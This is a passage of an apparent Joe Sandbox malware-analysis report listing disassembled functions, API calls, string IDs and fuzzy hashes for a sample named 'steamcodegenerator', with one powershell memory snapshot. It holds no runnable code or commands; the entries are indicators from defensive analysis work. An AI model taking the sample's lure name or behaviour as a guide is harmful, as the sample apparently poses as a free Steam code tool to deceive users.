                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: _set_statfp
                                                                        • String ID:
                                                                        • API String ID: 1156100317-0
                                                                        • Opcode ID: 160c9c08bfc40915d9b2f250b4fe9603e2aa0f10eb61f97881b22bd1a26b2934
                                                                        • Instruction ID: 4fe87fbfaf37129624e574888726dc6f73a7320ea5e3fb9df177d06fe5c8aa37
                                                                        • Opcode Fuzzy Hash: 160c9c08bfc40915d9b2f250b4fe9603e2aa0f10eb61f97881b22bd1a26b2934
                                                                        • Instruction Fuzzy Hash: A3118E33E18A1282FA94112AE4473791170AF6B374E4A0230E56EFF3F7CE6CB8414216
                                                                        APIs
                                                                        • FlsGetValue.KERNEL32(?,?,?,00007FF663551CE7,?,?,00000000,00007FF663551F82,?,?,?,?,?,00007FF663551F0E), ref: 00007FF66355A4F7
                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF663551CE7,?,?,00000000,00007FF663551F82,?,?,?,?,?,00007FF663551F0E), ref: 00007FF66355A516
                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF663551CE7,?,?,00000000,00007FF663551F82,?,?,?,?,?,00007FF663551F0E), ref: 00007FF66355A53E
                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF663551CE7,?,?,00000000,00007FF663551F82,?,?,?,?,?,00007FF663551F0E), ref: 00007FF66355A54F
                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF663551CE7,?,?,00000000,00007FF663551F82,?,?,?,?,?,00007FF663551F0E), ref: 00007FF66355A560
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: Value
                                                                        • String ID:
                                                                        • API String ID: 3702945584-0
                                                                        • Opcode ID: f3e7b6d242c1910f2b5591a4fcee400abd11717328fc635c98f7e7c632fcba31
                                                                        • Instruction ID: 0b5610c29fbf9df3f8543b6d12fce87a31fdec55711e20d9b79223eb8d90be04
                                                                        • Opcode Fuzzy Hash: f3e7b6d242c1910f2b5591a4fcee400abd11717328fc635c98f7e7c632fcba31
                                                                        • Instruction Fuzzy Hash: 89113A30F18242C1FE59AB36A55757922769F847B0F544234E96EAF7D6DE2CF4028311
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: Value
                                                                        • String ID:
                                                                        • API String ID: 3702945584-0
                                                                        • Opcode ID: bd49efac836a00a7d6e6040a8177aeef1eacb3bc0844a01248e3808e30053e11
                                                                        • Instruction ID: 2bebc559f27e680f4b2ea2d244138dacf30febf3ecd6d066f1e67ff871a42fff
                                                                        • Opcode Fuzzy Hash: bd49efac836a00a7d6e6040a8177aeef1eacb3bc0844a01248e3808e30053e11
                                                                        • Instruction Fuzzy Hash: 18114530E19206C6F96AA6B6441707E26729F44374F584734DC3EEF3D2EE2CB4428321
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: CallEncodePointerTranslator
                                                                        • String ID: MOC$RCC
                                                                        • API String ID: 3544855599-2084237596
                                                                        • Opcode ID: 28528c47c0e47c61ea15e7d98c52d1fdbb12d4762e0c8dcc68e2cea472630b6c
                                                                        • Instruction ID: a57b7baca7f60bf6660a7e261bc5e2401008e9a8f38c9c253150123810d928c1
                                                                        • Opcode Fuzzy Hash: 28528c47c0e47c61ea15e7d98c52d1fdbb12d4762e0c8dcc68e2cea472630b6c
                                                                        • Instruction Fuzzy Hash: 8491A073A08B81DAE754DB64E8412AD7BB0FB45788F10413AEA8DAB756DF38D165C700
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                        • String ID: csm
                                                                        • API String ID: 2395640692-1018135373
                                                                        • Opcode ID: efb476289a48de47cc6c133713b57c80aca7b2cc6583d7a462300b28a4b57851
                                                                        • Instruction ID: 09853f627164a6ee7866aa8b2c02fcbfbafbe8f941c5bae3ee81eaff1066ac75
                                                                        • Opcode Fuzzy Hash: efb476289a48de47cc6c133713b57c80aca7b2cc6583d7a462300b28a4b57851
                                                                        • Instruction Fuzzy Hash: 8051C232B19602CADB98CB15E445A7C73B5EB44B89F128131EA4A9B78ADF3DE851C700
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: CallEncodePointerTranslator
                                                                        • String ID: MOC$RCC
                                                                        • API String ID: 3544855599-2084237596
                                                                        • Opcode ID: 8ff30341cfee721db4765e122103f5437cfdd667779e7ccbcb0684ed890b6ecf
                                                                        • Instruction ID: 4b19d21e7f41261b900a46ccf15df182fb74a1e6f0f93936edbc233fcf859cad
                                                                        • Opcode Fuzzy Hash: 8ff30341cfee721db4765e122103f5437cfdd667779e7ccbcb0684ed890b6ecf
                                                                        • Instruction Fuzzy Hash: D461A032908B85D1D7649B15E4413AEB7B0FB85B94F044235EB9CABB5ADF7CD1A4CB00
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                        • String ID: csm$csm
                                                                        • API String ID: 3896166516-3733052814
                                                                        • Opcode ID: d1a409f6a23794f2edf1c37610bd8a1d13082c0ad3cb85bcd98522ffa63453bc
                                                                        • Instruction ID: 8fda3a03c6aa7736f4f4861e210acfece2663d65530cb064a75b322df3b3c55c
                                                                        • Opcode Fuzzy Hash: d1a409f6a23794f2edf1c37610bd8a1d13082c0ad3cb85bcd98522ffa63453bc
                                                                        • Instruction Fuzzy Hash: 96519072D08282D6EB788F25954636877B0EB84B94F148135DA9DABBDACF3CE474C700
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                        • String ID: bad locale name
                                                                        • API String ID: 2775327233-1405518554
                                                                        • Opcode ID: 00736578c6eb0824a3dbfeb00187506f444d3a2b9fb46ce52c71a5bb71dfef5f
                                                                        • Instruction ID: a37206dc75e84f3db6ea98d1b027782b7aff179f3829a377d20b8f85267f15c6
                                                                        • Opcode Fuzzy Hash: 00736578c6eb0824a3dbfeb00187506f444d3a2b9fb46ce52c71a5bb71dfef5f
                                                                        • Instruction Fuzzy Hash: 2341E932B0AA41C9EF18DFA1D4922FC3374AF44758F084875DA4DABB56DE38E526D344
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                                        • String ID:
                                                                        • API String ID: 2718003287-0
                                                                        • Opcode ID: 5c4401886065423c6ff0b2da39cbcb580a1fa276b42842d1cd99b8de723316d1
                                                                        • Instruction ID: 015bffab2a585b077191769a75278efd8ca86894d6b1f0b7819618739d56cd32
                                                                        • Opcode Fuzzy Hash: 5c4401886065423c6ff0b2da39cbcb580a1fa276b42842d1cd99b8de723316d1
                                                                        • Instruction Fuzzy Hash: 61D1BD32F08A81C9E711CB65D4412AC37B1EB55BA8B548236DE5EEBB99DF38E506C700
                                                                        APIs
                                                                        • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF66355D3AF), ref: 00007FF66355D4E0
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF66355D3AF), ref: 00007FF66355D56B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: ConsoleErrorLastMode
                                                                        • String ID:
                                                                        • API String ID: 953036326-0
                                                                        • Opcode ID: f4c598b794b2957f8221025396d44ea9ca5fd2ca3015efc81122515608aa3158
                                                                        • Instruction ID: 02d4279841fa1fa9e5b9901f44237508d674d011d23f8885f3c37f67c376d417
                                                                        • Opcode Fuzzy Hash: f4c598b794b2957f8221025396d44ea9ca5fd2ca3015efc81122515608aa3158
                                                                        • Instruction Fuzzy Hash: 4A918D73A08652C5FB619F6594822BD2BF0AF45BA8F145139DE0EABB95DE38F442C700
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: __except_validate_context_record
                                                                        • String ID: csm$csm
                                                                        • API String ID: 1467352782-3733052814
                                                                        • Opcode ID: 932fa6e829df123efbcca097b2357dada1d6fbdb0e4c3a71699927478b386a7c
                                                                        • Instruction ID: 51c0734d117669ff82318b2449df55344b0d587a4b3e83229577a2c4b2152235
                                                                        • Opcode Fuzzy Hash: 932fa6e829df123efbcca097b2357dada1d6fbdb0e4c3a71699927478b386a7c
                                                                        • Instruction Fuzzy Hash: F171C372A08682E6DB688F25D44177D7BB0FB45B88F048136DA4DABB8ACF3CD465C740
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFrameInfo__except_validate_context_record
                                                                        • String ID: csm
                                                                        • API String ID: 2558813199-1018135373
                                                                        • Opcode ID: 6163656b69aba43e6f85f19a250a019f0052d4614d76d8c745b3035227ed82da
                                                                        • Instruction ID: b30b0f92e2a3d8c4867ff28ecaa991e9b6649e213845cab004e20f793a5f9de9
                                                                        • Opcode Fuzzy Hash: 6163656b69aba43e6f85f19a250a019f0052d4614d76d8c745b3035227ed82da
                                                                        • Instruction Fuzzy Hash: EB514A72A19781C6DA64EB15E04226E77B4FB88B90F101534EB8D9BB56DF3CE471CB00
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorFileLastWrite
                                                                        • String ID: U
                                                                        • API String ID: 442123175-4171548499
                                                                        • Opcode ID: 018631f563cd5f86bf90a3ea0888df879cf18235863466e9cb65147d4980afc7
                                                                        • Instruction ID: 34cc0d11e54b4e4d18bc54f90ae67786609a89b0fd537aa67043308001db8347
                                                                        • Opcode Fuzzy Hash: 018631f563cd5f86bf90a3ea0888df879cf18235863466e9cb65147d4980afc7
                                                                        • Instruction Fuzzy Hash: 41418E33A19A85C1EB209F65E8453AA67B1FB98794F404031EE4DDBB98EF3CE441CB40
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_Yarn
                                                                        • String ID: bad locale name
                                                                        • API String ID: 1838369231-1405518554
                                                                        • Opcode ID: bc46d9a1bc2a7d05830fd543c4d4717b0fcd6854d73d0bf546987af89fa682f9
                                                                        • Instruction ID: eed6b19078a45543164d6af464cb2bb3c6ca6e84d18b8edaae5e40b6100e3239
                                                                        • Opcode Fuzzy Hash: bc46d9a1bc2a7d05830fd543c4d4717b0fcd6854d73d0bf546987af89fa682f9
                                                                        • Instruction Fuzzy Hash: 67016D22609BC1CAC748DF75A88116C77B5FB58B88B189539CA8CD771BEF38D5A0C340
                                                                        APIs
                                                                        • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF6635466AA), ref: 00007FF66354AB6C
                                                                        • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF6635466AA), ref: 00007FF66354ABAD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFileHeaderRaise
                                                                        • String ID: csm
                                                                        • API String ID: 2573137834-1018135373
                                                                        • Opcode ID: 2cb8a78e00c36ca855e3f70bae74cf4a1d3c179b7e048d680593ed73b494d009
                                                                        • Instruction ID: 3da228f472d25c40d6747283f8f98c078711f1df41f634279f2be034c7494e83
                                                                        • Opcode Fuzzy Hash: 2cb8a78e00c36ca855e3f70bae74cf4a1d3c179b7e048d680593ed73b494d009
                                                                        • Instruction Fuzzy Hash: 8E115E32619B8182EB648B16F40025977E5FB88B94F584234EA8D5B765DF3CD5518700
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Facet_LockitLockit::~_Register
                                                                        • String ID: @F
                                                                        • API String ID: 2774363102-2348236604
                                                                        • Opcode ID: 9d1408b99dfbbb19e9203b29269fb050f37ee393090f3ec43ea93e1dc3c37ed4
                                                                        • Instruction ID: 988609b9e3bc516e4674fdf209b7511c68f16c2df7832ff1fbf58b32fdd5792c
                                                                        • Opcode Fuzzy Hash: 9d1408b99dfbbb19e9203b29269fb050f37ee393090f3ec43ea93e1dc3c37ed4
                                                                        • Instruction Fuzzy Hash: 07E0ED26608B01C1EA14EF16F4920AE7370FB89BE4B4D5032EF8E5B756CE3CD5928B40
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.1970135785.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7ffd9ba00000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                        • Instruction ID: fc9c11f2e9de72c48521401c155ed76442494769910caf6d0da160ae5e66bd74
                                                                        • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                        • Instruction Fuzzy Hash: 6B01677125CB0C4FD748EF0CE451AA6B7E0FB99364F10056DE58AC36A5D736E881CB45